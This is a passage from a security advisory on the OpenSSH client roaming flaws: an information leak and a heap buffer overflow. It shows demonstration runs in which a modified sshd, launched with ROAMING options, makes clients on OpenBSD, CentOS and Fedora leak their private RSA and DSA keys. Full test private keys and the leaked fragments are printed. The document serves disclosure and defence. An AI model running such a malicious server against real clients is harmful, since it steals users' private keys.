KEY-----\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:2048\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-35ee7ab0/infoleak\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-6cb31d82/infoleak\n... \nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n$ /usr/bin/ssh -V\nOpenSSH_7.0, LibreSSL 2.2.2\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL\nruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s\n17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8\nL/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh\nxSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP\nvavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl\nJka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP\nKyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19\nqJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY\ngQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK\nQolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt\ngKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL\ncQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB\n+s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl\nhcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri\nhBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh\nvhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O\nnFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG\n8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n-----END RSA PRIVATE KEY-----\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 1 %h %p\" -p 222 127.0.0.1\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n(this example requires a ProxyCommand because of the NULL-aitop bug\ndescribed in the Mitigating Factors of the Information Leak section, and\ncrashes because of the NULL-pointer dereference discussed in the\nMitigating Factors of the Buffer Overflow section)\n\n# cat /tmp/roaming-a5eca355/infoleak\nry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: CentOS 7, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"CentOS Linux 7 (Core)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n\nGLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2\nhUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-b7b16dfc/infoleak\njJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5\n\n# strings /tmp/roaming-b324ce87/infoleak\nIuQL\nR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9v\n\n# strings /tmp/roaming-24011739/infoleak\nKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC\n\n# strings /tmp/roaming-37456846/infoleak\nLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA\nyq4Kwj/\n\n# strings /tmp/roaming-988ff54c/infoleak\nGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\n\n# strings /tmp/roaming-53887fa5/infoleak\n/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: Fedora 20, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"Fedora 20 (Heisenbug)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz\nHLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp\no9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ\n/B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy\n2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr\nHiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\njwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm\nqK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\nZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-a2bbc5f6/infoleak\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG\n\n# strings /tmp/roaming-47b46456/infoleak\nRGAcE0nc\nGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9\n\n# strings /tmp/roaming-7a6717ae/infoleak\ncawMW4LZ1\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p\n\n# strings /tmp/roaming-f3091f08/infoleak\nlZ3w0qHe\nnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\n\n# strings /tmp/roaming-62a9e9a3/infoleak\nlZ3w0qHe\nr3TwTa0pPEk11\nLbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37P\n\n# strings /tmp/roaming-8de31ed5/infoleak\n7qyvNznQ\n26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\n\n# strings /tmp/roaming-f5e0fbcc/infoleak\nyESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxS\n\n# strings /tmp/roaming-9be933df/infoleak\nQRtzK/GpRuMC1\nC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT\n\n# strings /tmp/roaming-ee4d1e6c/infoleak\nSG3aTqYp\ntEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s\n\n# strings /tmp/roaming-c2bfd69c/infoleak\nSG3aTqYp\n6JmTOun5zVV6A\nH6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s\n\n# strings /tmp/roaming-2b3217a1/infoleak\nDGLfFGdO\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ\n\n# strings /tmp/roaming-1e275747/infoleak\ng3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\n\n\n========================================================================\nBuffer Overflow (CVE-2016-0778)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nSupport for roaming was elegantly added to the OpenSSH client: the calls\nto read() and write() that communicate with the SSH server were replaced\nby calls to roaming_read() and roaming_write(), two wrappers that depend\non wait_for_roaming_reconnect() to transparently reconnect to the server\nafter a disconnection. The wait_for_roaming_reconnect() routine is\nessentially a sequence of four subroutines:\n\n239 int\n240 wait_for_roaming_reconnect(void)\n241 {\n... \n250 fprintf(stderr, \"[connection suspended, press return to resume]\");\n... \n252 packet_backup_state();\n253 /* TODO Perhaps we should read from tty here */\n254 while ((c = fgetc(stdin)) != EOF) {\n... \n259 if (c != \u0027\\n\u0027 \u0026\u0026 c != \u0027\\r\u0027)\n260 continue;\n261\n262 if (ssh_connect(host, \u0026hostaddr, options.port,\n... \n265 options.proxy_command) == 0 \u0026\u0026 roaming_resume() == 0) {\n266 packet_restore_state();\n... \n268 fprintf(stderr, \"[connection resumed]\\n\");\n... \n270 return 0;\n271 }\n272\n273 fprintf(stderr, \"[reconnect failed, press return to retry]\");\n... \n275 }\n276 fprintf(stderr, \"[exiting]\\n\");\n... \n278 exit(0);\n279 }\n\n1. packet_backup_state() close()s connection_in and connection_out (the\nold file descriptors that connected the client to the server), and saves\nthe state of the suspended SSH session (for example, the encryption and\ndecryption contexts). \n\n2. ssh_connect() opens new file descriptors, and connects them to the\nSSH server. \n\n3. roaming_resume() negotiates the resumption of the suspended SSH\nsession with the server, and calls resend_bytes(). \n\n4. packet_restore_state() updates connection_in and connection_out (with\nthe new file descriptors that connect the client to the server), and\nrestores the state of the suspended SSH session. \n\nThe new file descriptors for connection_in and connection_out may differ\nfrom the old ones (if, for example, files or pipes or sockets are opened\nor closed between two successive ssh_connect() calls), but unfortunately\nhistorical code in OpenSSH assumes that they are constant:\n\n- In client_loop(), the variables connection_in and connection_out are\n cached locally, but packet_write_poll() calls roaming_write(), which\n may assign new values to connection_in and connection_out (if a\n reconnection occurs), and client_wait_until_can_do_something()\n subsequently reuses the old, cached values. \n\n- client_loop() eventually updates these cached values, and the\n following FD_ISSET() uses a new, updated file descriptor (the fd\n connection_out), but an old, out-of-date file descriptor set (the\n fd_set writeset). \n\n- packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API)\n first calloc()ates setp, a file descriptor set for connection_in;\n next, it loops around memset(), FD_SET(), select() and roaming_read();\n last, it free()s setp and returns. Unfortunately, roaming_read() may\n reassign a higher value to connection_in (if a reconnection occurs),\n but setp is never enlarged, and the following memset() and FD_SET()\n may therefore overflow setp (a heap-based buffer overflow):\n\n1048 int\n1049 packet_read_seqnr(u_int32_t *seqnr_p)\n1050 {\n.... \n1052 fd_set *setp;\n.... \n1058 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_in + 1,\n1059 NFDBITS), sizeof(fd_mask));\n.... \n1065 for (;;) {\n.... \n1075 if (type != SSH_MSG_NONE) {\n1076 free(setp);\n1077 return type;\n1078 }\n.... \n1083 memset(setp, 0, howmany(active_state-\u003econnection_in + 1,\n1084 NFDBITS) * sizeof(fd_mask));\n1085 FD_SET(active_state-\u003econnection_in, setp);\n.... \n1092 for (;;) {\n.... \n1097 if ((ret = select(active_state-\u003econnection_in + 1, setp,\n1098 NULL, NULL, timeoutp)) \u003e= 0)\n1099 break;\n.... \n1115 }\n.... \n1117 do {\n.... \n1119 len = roaming_read(active_state-\u003econnection_in, buf,\n1120 sizeof(buf), \u0026cont);\n1121 } while (len == 0 \u0026\u0026 cont);\n.... \n1130 }\n1131 /* NOTREACHED */\n1132 }\n\n- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is\n basically similar to packet_read_seqnr() and may overflow its own setp\n if roaming_write() (called by packet_write_poll()) reassigns a higher\n value to connection_out (after a successful reconnection):\n\n1739 void\n1740 packet_write_wait(void)\n1741 {\n1742 fd_set *setp;\n.... \n1746 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_out + 1,\n1747 NFDBITS), sizeof(fd_mask));\n1748 packet_write_poll();\n1749 while (packet_have_data_to_write()) {\n1750 memset(setp, 0, howmany(active_state-\u003econnection_out + 1,\n1751 NFDBITS) * sizeof(fd_mask));\n1752 FD_SET(active_state-\u003econnection_out, setp);\n.... \n1758 for (;;) {\n.... \n1763 if ((ret = select(active_state-\u003econnection_out + 1,\n1764 NULL, setp, NULL, timeoutp)) \u003e= 0)\n1765 break;\n.... \n1776 }\n.... \n1782 packet_write_poll();\n1783 }\n1784 free(setp);\n1785 }\n\n------------------------------------------------------------------------\nMitigating Factors\n------------------------------------------------------------------------\n\nThis buffer overflow affects all OpenSSH clients \u003e= 5.4, but its impact\nis significantly reduced by the Mitigating Factors detailed in the\nInformation Leak section, and additionally:\n\n- OpenSSH versions \u003e= 6.8 reimplement packet_backup_state() and\n packet_restore_state(), but introduce a bug that prevents the buffer\n overflow from being exploited; indeed, ssh_packet_backup_state() swaps\n two local pointers, ssh and backup_state, instead of swapping the two\n global pointers active_state and backup_state:\n\n 9 struct ssh *active_state, *backup_state;\n... \n238 void\n239 packet_backup_state(void)\n240 {\n241 ssh_packet_backup_state(active_state, backup_state);\n242 }\n243\n244 void\n245 packet_restore_state(void)\n246 {\n247 ssh_packet_restore_state(active_state, backup_state);\n248 }\n\n2269 void\n2270 ssh_packet_backup_state(struct ssh *ssh,\n2271 struct ssh *backup_state)\n2272 {\n2273 struct ssh *tmp;\n.... \n2279 if (backup_state)\n2280 tmp = backup_state;\n2281 else\n2282 tmp = ssh_alloc_session_state();\n2283 backup_state = ssh;\n2284 ssh = tmp;\n2285 }\n.... \n2291 void\n2292 ssh_packet_restore_state(struct ssh *ssh,\n2293 struct ssh *backup_state)\n2294 {\n2295 struct ssh *tmp;\n.... \n2299 tmp = backup_state;\n2300 backup_state = ssh;\n2301 ssh = tmp;\n2302 ssh-\u003estate-\u003econnection_in = backup_state-\u003estate-\u003econnection_in;\n\n As a result, the global pointer backup_state is still NULL when passed\n to ssh_packet_restore_state(), and crashes the OpenSSH client when\n dereferenced:\n\n# env ROAMING=\"overflow:A fd_leaks:0\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 15 %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n This bug prevents the buffer overflow from being exploited, but not\n the information leak, because the vulnerable function resend_bytes()\n is called before ssh_packet_restore_state() crashes. \n\n------------------------------------------------------------------------\nFile 